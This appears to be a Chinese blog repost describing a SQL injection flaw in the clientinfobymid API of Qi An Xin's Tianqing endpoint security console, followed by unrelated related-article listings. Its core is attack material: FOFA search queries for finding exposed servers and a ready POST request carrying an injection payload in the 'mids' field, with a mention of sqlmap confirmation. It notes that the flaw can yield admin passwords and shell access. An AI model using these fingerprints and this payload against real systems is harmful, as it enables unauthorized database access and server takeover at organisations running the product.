天擎终端安全管理系统clientinfobymid存在SQL注入漏洞

这篇具有很好参考价值的文章主要介绍了天擎终端安全管理系统clientinfobymid存在SQL注入漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

产品简介

奇安信天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护。

漏洞概述

奇安信天擎终端安全管理系统控制台clientinfobymid接口处存在SQL注入漏洞,攻击者除了可以利用 该SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

指纹识别

fofa:

banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"

漏洞利用

poc:

POST /api/terminal/clientinfobymid HTTP/1.1
Host: you_ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

{"mids":{"1 ,:mid_1);select 'aaa' -- aa":"","1":1}}

天擎终端安全管理系统clientinfobymid存在SQL注入漏洞,漏洞复现,安全,sql,网络
sqlmap验证
天擎终端安全管理系统clientinfobymid存在SQL注入漏洞,漏洞复现,安全,sql,网络

【故事、故事,便是故去的事情了,多说无益。】文章来源地址https://www.toymoban.com/news/detail-775538.html

到了这里,关于天擎终端安全管理系统clientinfobymid存在SQL注入漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 润和软件HopeStage与深信服终端安全管理系统完成产品兼容性互认证

    近日,江苏润和软件股份有限公司(以下简称“润和软件”)HopeStage 操作系统与深信服科技股份有限公司(以下简称“深信服”)终端安全管理系统完成产品兼容性测试。 测试结果表明,企业级通用操作系统HopeStage V1.0产品与深信服终端安全管理系统V3.0产品可以顺利适配、

    2024年02月05日
    浏览(51)
  • ATT&CK覆盖度97.1%!360终端安全管理系统获赛可达认证

    近日,国际知名第三方网络安全检测服务机构——赛可达实验室(SKD Labs)发布最新测试报告,360终端安全管理系统以ATTCK V12框架攻击技术覆盖面377个、覆盖度97.1%,勒索病毒、挖矿病毒检出率100%,误报率0%的突出战绩,占据行业同类产品领军地位,顺利通过赛可达实验室资产

    2024年02月12日
    浏览(37)
  • 智慧物业 内外共建 ——七巧低代码打造终端智能物业管理系统

    物业管理 是城市管理的重要组成部分,也是社区居民的刚需服务。 随着城市化进程的加快,物业管理面临着越来越多的挑战,如业主需求的多样化、业务流程的复杂化、数据信息的庞大化、外部系统的集成化等。这些挑战要求物业公司提高自身的管理水平和服务质量,实现

    2024年02月19日
    浏览(48)
  • 【Shell 命令集合 系统管理 】Linux 终端复用工具 screen命令 使用指南

    Shell 命令专栏:Linux Shell 命令全解析 screen命令是一个在Linux操作系统中使用的终端复用工具。它允许用户在一个终端窗口中同时运行多个终端会话,并且可以在这些会话之间自由切换。 screen命令的主要作用是提供一个“会话管理器”,可以在一个终端窗口中创建多个虚拟终端

    2024年02月05日
    浏览(74)
  • Linux login命令教程:如何终端登录系统、管理用户会话(附实例详解和注意事项)

    login 命令用于登录到系统。它要求用户输入用户名和密码,然后验证这些凭据并启动一个新的会话。通常, login 命令用于文本终端登录,但也可以在图形界面中使用。 login 命令在所有主要的 Linux 发行版中都可用,包括 Debian、Ubuntu、CentOS、Fedora 等。如果遇到不适用的情况,

    2024年03月21日
    浏览(62)
  • 内网安全管理系统(保密管理系统)

    在当今信息化的时代,企业的内网已经成为其核心资产的重要组成部分。 随着企业的快速发展和信息化程度的提升,内网安全问题日益凸显,如何保障内网的安全和机密信息的保密性,已经成为企业亟待解决的问题。 内网安全管理系统(保密管理系统)是一种集成了先进的

    2024年01月20日
    浏览(58)
  • 安全生产管理系统助力企业安全细化管理

    安全生产管理系统利用完整的安全生产管理体系,结合信息化、数字化和智能化等技术手段,将安全生产过程中的各个环节进行有效整合,使安全管理更加科学、规范和高效。 安全生产管理系统可以对企业安全生产进行全面、细致的管理。它能够实现对企业安全生产活动的全

    2024年02月06日
    浏览(58)
  • 物联网开发终端管理篇-java从MQTT获取设备数据,并通过Druid连接池把数据写入MySQL数据库(Windows系统)

    下面来给大家做个简单的数据对接,也就是通过写JAVA代码实现MQTT协议 首页我们得搭建一个简单的IDEA项目,这个我就不做演示了 搭建完项目,我们需要准备一些jar包,jar包名如下: org.eclipse.paho.client.mqttv3-1.1.0.jar mysql-connector-java-5.1.34.jar jackson-databind-2.10.0.jar jackson-core-2.10.0

    2024年02月11日
    浏览(52)
  • 焊接安全管理系统

           1范围        为了规范现场动火管理工作,提高动火安全监控水平,使动火安全管理工作规范化、制度化、标准化,避免发生火灾事故,保障动火工作中的人身和设备安全,特制定本办法。        焊接安全管理系统是德州迪格特电子科技有限公司研发的一款具有便

    2024年02月03日
    浏览(37)
  • 施工现场安全管理系统

    伴随着社会发展,各行各业都十分注重安全生产管理;建筑施工行业,由于施工环境具有复杂性、危险源较多、施工人员素质参差不齐等因素,导致安全事故时有发生;凡尔码施工安全管理系统,灵活根据施工现场管理要求搭建安全管理各个模块;通过系统确保各项安全管理

    2024年02月03日
    浏览(58)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包